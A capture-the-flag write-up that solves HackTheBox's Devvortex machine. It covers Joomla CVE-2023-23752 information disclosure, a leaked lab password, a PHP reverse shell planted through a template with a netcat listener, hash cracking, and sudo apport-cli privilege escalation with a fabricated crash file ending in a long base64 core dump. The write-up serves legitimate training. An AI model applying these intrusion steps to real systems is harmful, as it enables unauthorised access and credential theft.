Overview
Hello everyone, In this writeup we are going to solve Devvortex from HackTheBox.
Link for the machine : https://app.hackthebox.com/machines/Devvortex
Difficulty Level : Easy
Lets Start 🙌
Connect to the HTB server by using the OpenVpn configuration file that’s generated by HTB.
[ Click Here to learn more about how to connect to vpn and access the boxes. ]
After connecting to the vpn service, click on Join Machine to access the machine’s ip.
After joining the machine you can see the IP Address of the target machine.
Reconnaissance
Rustscan
rustscan -a <TARGET> -- T4 -v -A
Nmap Default Scripts
nmap -sC <TARGET>
Results
Ports Services Service Version
Information Gathering - devvortex.htb
From the reconnaissance results, there is website running on port 80. I visited the website but it is redirected to the domain devvortex.htb
and the domain name is not resolved.
To access the website, we have to map the domain name to the target IP. We can do this by modifying the /etc/hosts
file. Append the underlined line from the image below in /etc/hosts
file. The target IP might differ in your case.
After modifying the /etc/hosts
file, refresh the website to see the contents of the website.
Active Infrastructure Enumeration
curl -I "http://${TARGET}"
Whatweb
whatweb -a 1 http://devvortex.htb
Wafw00f
wafw00f http://devvortex.htb
Active Subdomain Enumeration
Subdomain Fuzzing
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u https://FUZZ.devvortex.htb/
VHost Fuzzing
ffuf -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u http://devvortex.htb/ -H 'Host: FUZZ.devvortex.htb' -fs 154
Results
Found no subdomains.
Found a vhost dev.devvortex.htb
.
To access the vhost , add add the domain to new subdomain /etc/hosts
as before and visit the subdomain in a browser.
Information Gathering - dev.devvortex.htb
After modifying the /etc/hosts
file, refresh the website to see the contents of the website.
Active Infrastructure Enumeration
curl -I "http://${TARGET}"
Whatweb
whatweb -a 1 https://dev.devvortex.htb
Waw00f
wafw00f http://devvortex.htb
Results
Nothing interesting found.
Enumerating the Website - dev.devvortex.htb
Robots.txt
robots.txt - Found
From the above listed paths, the /administrator
path sounds interesting.
So I first visited the /administrator
path.
Its a Joomla Administrator Login page.
I first tried for some default credentials like admin:admin
, but didn’t work.
Droopescan
Next I used droopescan
tool to enumerate the joomla
website.
droopescan scan joomla --url http://dev.devvortex.htb/
From the results of droopescan
, I visited http://dev.devvortex.htb/administrator/manifests/files/joomla.xml
to check for version information.
The joomla.xml
was accessible and got the joomla version: 4.2.6.
Next I searched for exploits for the above mentioned version and found the following:
CVE-2023-23752
After taking a look at the exploit, the exploit basically makes requests to the following endpoints and parses the response data and displays it to us:
/api/index.php/v1/users?public=true
/api/index.php/v1/config/application?public=true
So, instead of running the exploit, I directly visited the above endpoints in the browser.
The first endpoint responded with a list of users.
And the second endpoint responded with the configuration of the application which also had the password of the user lewis
, that we found in the previous endpoint, who is part of the Super Users
group.
Initial Access
With credentials lewis:P4ntherg0t1n5r3c0n##
, that we found in the enumeration process, I tried to login in the joomla
administrator page and was able successfully login.
Since we got access to administrator dashboard, I checked out whether it is possible to inject or modify the code in the available templates as mentioned here:
We can see the available templates under the system tab of the dasboard. I decided to try to modify the administrator template.
Next select the following.
In the template customize page you can see a list of available files and options to create, edit, save and delete files.
I decided to create a php
file that contains the code to fetch a reverse shell back to us from the server. First click New File.
There is a option to upload a file, I tried to upload a php reverse shell, it didn’t work. So I decided to create a new file and copy the contents of the php reverse shell to the file. To do so enter the file name and choose the extension as php and then click create.
I used the pentest monkey php reverse shell:
I copied the contents of the reverse shell and pasted in the editor. Don;t forget to update your tun0 IP address in the reverse shell.
Now click Save&Close
and start a netcat
listener using the command nc -lvnp 1234
.
Now visit the following URL: http://dev.devvortex.htb/administrator/templates/atum/<nameTheFileThatYouCreated>.php
and check your reverse shell.
Now we got the reverse shell back.
I first upgraded my shell using the command: python3 -c "import pty;pty.spawn('/bin/bash')”
.
We can see that, currently we are the user www-data
.
Now its time to look out for privilege escalation vectors.
Privilege Escalation
Getting The User Flag
First I checked the available users in the target machine.
There is another user named logan
. And I checked the /home/logan
folder which has the user flag, but we don’t have permissions to read it.
Next I was looking out for some basic privilege escalation vectors, but got nothing. Then I remembered the about the credentials that we used to login to Joomla
which we can use to try to login to the mysql
database.
mysql -u lewis -p
[ -p
- to mention password based login ]
I was able to successfully login and found a database named joomla
.
Next I tried to view the available tables using command: show tables;
The above command responded with a long list of which sd4fg_users
table got my attention.
Next I viewed the contents of the sd4fg_users
table.
It had two users with their password hashes, which seems like a usual linux user account password hash ( blowfish hash ). Since we know that there is another user in the machine named logan
, I tried to crack the logan
user’s password hash using john
.
And I got it cracked and I used the password to login as logan
to the target machine via ssh.
I was able to successfully login and also got the user flag.
Getting The Root Flag
Next, again started looking out for privilege escalation vectors. Started with sudo -l
command and got the following output.
The user logan
can only run /usr/bin/apport-cli
with root privileges. apport-cli
is basically a tool that generate crash reports. Next I checked the version of the apport-cli
I searched about the above version of apport-cli
and found the following commit:
which is a POC for to use this tool to escalate our privileges.
I tried it. But I wasn’t able to find the crash file in the /var/crash
location. Then I was searching on google on how to create the crash file and got following crash file content from
Copy ProblemType: Crash
Architecture: amd64
CrashCounter: 1
Date: Sat Dec 2 09:57:23 2023
DistroRelease: Ubuntu 20.04
ExecutablePath: /usr/bin/sleep
ExecutableTimestamp: 1567679920
ProcCmdline: sleep 13
ProcCwd: /var/crash
ProcEnviron:
SHELL=/bin/bash
LANG=en_US.UTF-8
TERM=xterm-256color
XDG_RUNTIME_DIR=<set>
PATH=(custom, no user)
ProcMaps:
561bbda55000-561bbda57000 r--p 00000000 08:02 20093 /usr/bin/sleep
561bbda57000-561bbda5b000 r-xp 00002000 08:02 20093 /usr/bin/sleep
561bbda5b000-561bbda5d000 r--p 00006000 08:02 20093 /usr/bin/sleep
561bbda5e000-561bbda5f000 r--p 00008000 08:02 20093 /usr/bin/sleep
561bbda5f000-561bbda60000 rw-p 00009000 08:02 20093 /usr/bin/sleep
561bbf60f000-561bbf630000 rw-p 00000000 00:00 0 [heap]
7f5b30817000-7f5b30afd000 r--p 00000000 08:02 19524 /usr/lib/locale/locale-archive
7f5b30afd000-7f5b30b1f000 r--p 00000000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30b1f000-7f5b30c97000 r-xp 00022000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30c97000-7f5b30ce5000 r--p 0019a000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ce5000-7f5b30ce9000 r--p 001e7000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ce9000-7f5b30ceb000 rw-p 001eb000 08:02 20805 /usr/lib/x86_64-linux-gnu/libc-2.31.so
7f5b30ceb000-7f5b30cf1000 rw-p 00000000 00:00 0
7f5b30cf8000-7f5b30cf9000 r--p 00000000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30cf9000-7f5b30d1c000 r-xp 00001000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d1c000-7f5b30d24000 r--p 00024000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d25000-7f5b30d26000 r--p 0002c000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d26000-7f5b30d27000 rw-p 0002d000 08:02 20757 /usr/lib/x86_64-linux-gnu/ld-2.31.so
7f5b30d27000-7f5b30d28000 rw-p 00000000 00:00 0
7ffe6d90d000-7ffe6d92e000 rw-p 00000000 00:00 0 [stack]
7ffe6d953000-7ffe6d956000 r--p 00000000 00:00 0 [vvar]
7ffe6d956000-7ffe6d957000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 --xp 00000000 00:00 0 [vsyscall]
ProcStatus:
Name: sleep
Umask: 0002
State: S (sleeping)
Tgid: 2173
Ngid: 0
Pid: 2173
PPid: 1515
TracerPid: 0
Uid: 1000 1000 1000 1000
Gid: 1000 1000 1000 1000
FDSize: 256
Groups: 1000
NStgid: 2173
NSpid: 2173
NSpgid: 2173
NSsid: 1515
VmPeak: 5476 kB
VmSize: 5476 kB
VmLck: 0 kB
VmPin: 0 kB
VmHWM: 584 kB
VmRSS: 584 kB
RssAnon: 68 kB
RssFile: 516 kB
RssShmem: 0 kB
VmData: 176 kB
VmStk: 132 kB
VmExe: 24 kB
VmLib: 1640 kB
VmPTE: 48 kB
VmSwap: 0 kB
HugetlbPages: 0 kB
CoreDumping: 1
THP_enabled: 1
Threads: 1
SigQ: 0/15317
SigPnd: 0000000000000000
ShdPnd: 0000000000000000
SigBlk: 0000000000000000
SigIgn: 0000000000000000
SigCgt: 0000000000000000
CapInh: 0000000000000000
CapPrm: 0000000000000000
CapEff: 0000000000000000
CapBnd: 0000003fffffffff
CapAmb: 0000000000000000
NoNewPrivs: 0
Seccomp: 0
Speculation_Store_Bypass: thread vulnerable
Cpus_allowed: 3
Cpus_allowed_list: 0-1
Mems_allowed: 00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001
Mems_allowed_list: 0
voluntary_ctxt_switches: 3
nonvoluntary_ctxt_switches: 2
Signal: 11
Uname: Linux 5.4.0-167-generic x86_64
UserGroups: N/A
_LogindSession: 7
CoreDump: base64
H4sICAAAAAAC/0NvcmVEdW1wAA==
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